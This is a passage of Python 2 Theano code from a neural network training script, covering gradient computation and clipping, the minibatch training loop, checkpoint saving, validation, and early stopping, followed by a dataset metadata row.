f_log_probs = theano.function(inps, [cost, predict_label], profile=profile)
print 'Done'
cost = cost.mean()
# apply L2 regularization on weights
# if decay_c > 0.:
# decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
# weight_decay = 0.
# for kk, vv in tparams.iteritems():
# weight_decay += (vv ** 2).sum()
# weight_decay *= decay_c
# cost += weight_decay
## regularize the alpha weights
#if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
# alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
# alpha_reg = alpha_c * (
# (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
# opt_ret['dec_alphas'].sum(0)) ** 2).sum(1).mean()
# cost += alpha_reg
# after all regularizers - compile the computational graph for cost
print 'Building f_cost...',
f_cost = theano.function(inps, cost, profile=profile)
print 'Done'
print 'Computing gradient...',
grads = tensor.grad(cost, wrt=itemlist(tparams))
print 'Done'
# apply gradient clipping here
if clip_c > 0.:
g2 = 0.
for g in grads:
g2 += (g ** 2).sum()
new_grads = []
for g in grads:
new_grads.append(tensor.switch(g2 > (clip_c ** 2),
g / tensor.sqrt(g2) * clip_c,
g))
grads = new_grads
# compile the optimizer, the actual computational graph is compiled here
lr = tensor.scalar(name='lr')
print 'Building optimizers...',
f_grad_shared, f_update = eval(optimizer)(lr, tparams, grads, inps, cost)
print 'Done'
print 'Optimization'
best_p = None
bad_counter = 0
bad_counter_acc = 0
uidx = 0
estop = False
history_errs = []
history_accs = []
epoch_accs = []
# reload history
if reload_ and os.path.exists(saveto):
rmodel = numpy.load(saveto)
history_errs = list(rmodel['history_errs'])
if 'uidx' in rmodel:
uidx = rmodel['uidx']
if validFreq == -1:
validFreq = len(train[0]) / batch_size
if saveFreq == -1:
saveFreq = len(train[0]) / batch_size
#if sampleFreq == -1:
# sampleFreq = len(train[0]) / batch_size
for eidx in xrange(max_epochs):
n_samples = 0
for x, x_syn, y, y_syn, label in train:
n_samples += len(x)
uidx += 1
use_noise.set_value(1.)
try:
x, x_mask, bk_x, y, y_mask, bk_y, label = prepare_data(x, x_syn, y, y_syn, label, maxlen=maxlen,
n_words_src=n_words_src, bk_for_x=model_options['bk_for_x'],
bk_for_y=model_options['bk_for_y'], bk_dim=model_options['bk_dim'],
n_words=n_words)
except ValueError:
print prepare_data(x, x_syn, y, y_syn, label, maxlen=maxlen,
n_words_src=n_words_src, bk_for_x=model_options['bk_for_x'],
bk_for_y=model_options['bk_for_y'], bk_dim=model_options['bk_dim'],
n_words=n_words)
raise
if x is None:
print 'Minibatch with zero sample under length ', maxlen
uidx -= 1
continue
ud_start = time.time()
# compute cost, grads and copy grads to shared variables
cost = f_grad_shared(x, x_mask, bk_x, y, y_mask, bk_y, label)
# do the update on parameters
#print 'Befor:'
#print tparams['ff_logit_W'].get_value()
f_update(lrate)
#print 'After:'
#print tparams['ff_logit_W'].get_value()
#update = f_update(lrate)
#print update
ud = time.time() - ud_start
# check for bad numbers, usually we remove non-finite elements
# and continue training - but not done here
if numpy.isnan(cost) or numpy.isinf(cost):
print 'NaN detected'
return 1., 1., 1.
# verbose
if numpy.mod(uidx, dispFreq) == 0:
log.info('Epoch: %d Update: %d Cost: %f UD: %f'%(eidx, uidx, cost, ud))
# save the best model so far, in addition, save the latest model
# into a separate file with the iteration number for external eval
if numpy.mod(uidx, saveFreq) == 0:
print 'Saving the best model...',
if best_p is not None:
params = best_p
else:
params = unzip(tparams)
numpy.savez(saveto, history_errs=history_errs, uidx=uidx, **params)
pkl.dump(model_options, open('%s.pkl' % saveto, 'wb'))
print 'Done'
# save with uidx
if not overwrite:
print 'Saving the model at iteration {}...'.format(uidx),
saveto_uidx = '{}.iter{}.npz'.format(
os.path.splitext(saveto)[0], uidx)
numpy.savez(saveto_uidx, history_errs=history_errs,
uidx=uidx, **unzip(tparams))
print 'Done'
# validate model on validation set and early stop if necessary
if numpy.mod(uidx, validFreq) == 0:
use_noise.set_value(0.)
#print 'Here:'
#print tparams['ff_logit_W'].get_value()
#print unzip(tparams)
valid_errs, valid_acc = pred_probs(f_log_probs, prepare_data,
model_options, valid)
valid_err = valid_errs.mean()
history_errs.append(valid_err)
test_errs, test_acc = pred_probs(f_log_probs, prepare_data,
model_options, test)
test_err = test_errs.mean()
history_accs.append(test_acc)
if uidx == 0 or valid_err <= numpy.array(history_errs).min():
best_p = unzip(tparams)
bad_counter = 0
if len(history_errs) > patience and valid_err >= \
numpy.array(history_errs)[:-patience].min():
bad_counter += 1
if bad_counter > patience:
print 'Early Stop!'
#estop = True
#break
if numpy.isnan(valid_err):
ipdb.set_trace()
log.info('Epoch: %d Update: %d ValidAcc: %f TestAcc: %f' % (eidx, uidx, valid_acc, test_acc))
# finish after this many updates
if uidx >= finish_after:
print 'Finishing after %d iterations!' % uidx
estop = True
break
print 'Seen %d samples' % n_samples
if len(history_accs) > 0:
epoch_accs.append(history_accs[-1])
if len(epoch_accs) > 1 and epoch_accs[-1] <= numpy.array(epoch_accs)[:-1].max():
bad_counter_acc += 1
if bad_counter_acc > 2:
print 'Early Stop Acc!'
#estop = True
#break
if estop:
break
if best_p is not None:
zipp(best_p, tparams)
use_noise.set_value(0.)
test_err, acc = pred_probs(f_log_probs, prepare_data,
model_options, test)
print 'Test acc ', acc
params = copy.copy(best_p)
numpy.savez(saveto, zipped_params=best_p,
history_errs=history_errs,
uidx=uidx,
**params)
return valid_err
if __name__ == '__main__':
pass
| bsd-3-clause | 2,461,992,773,011,421,700 | 36.937821 | 252 | 0.529831 | false | 3.385561 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.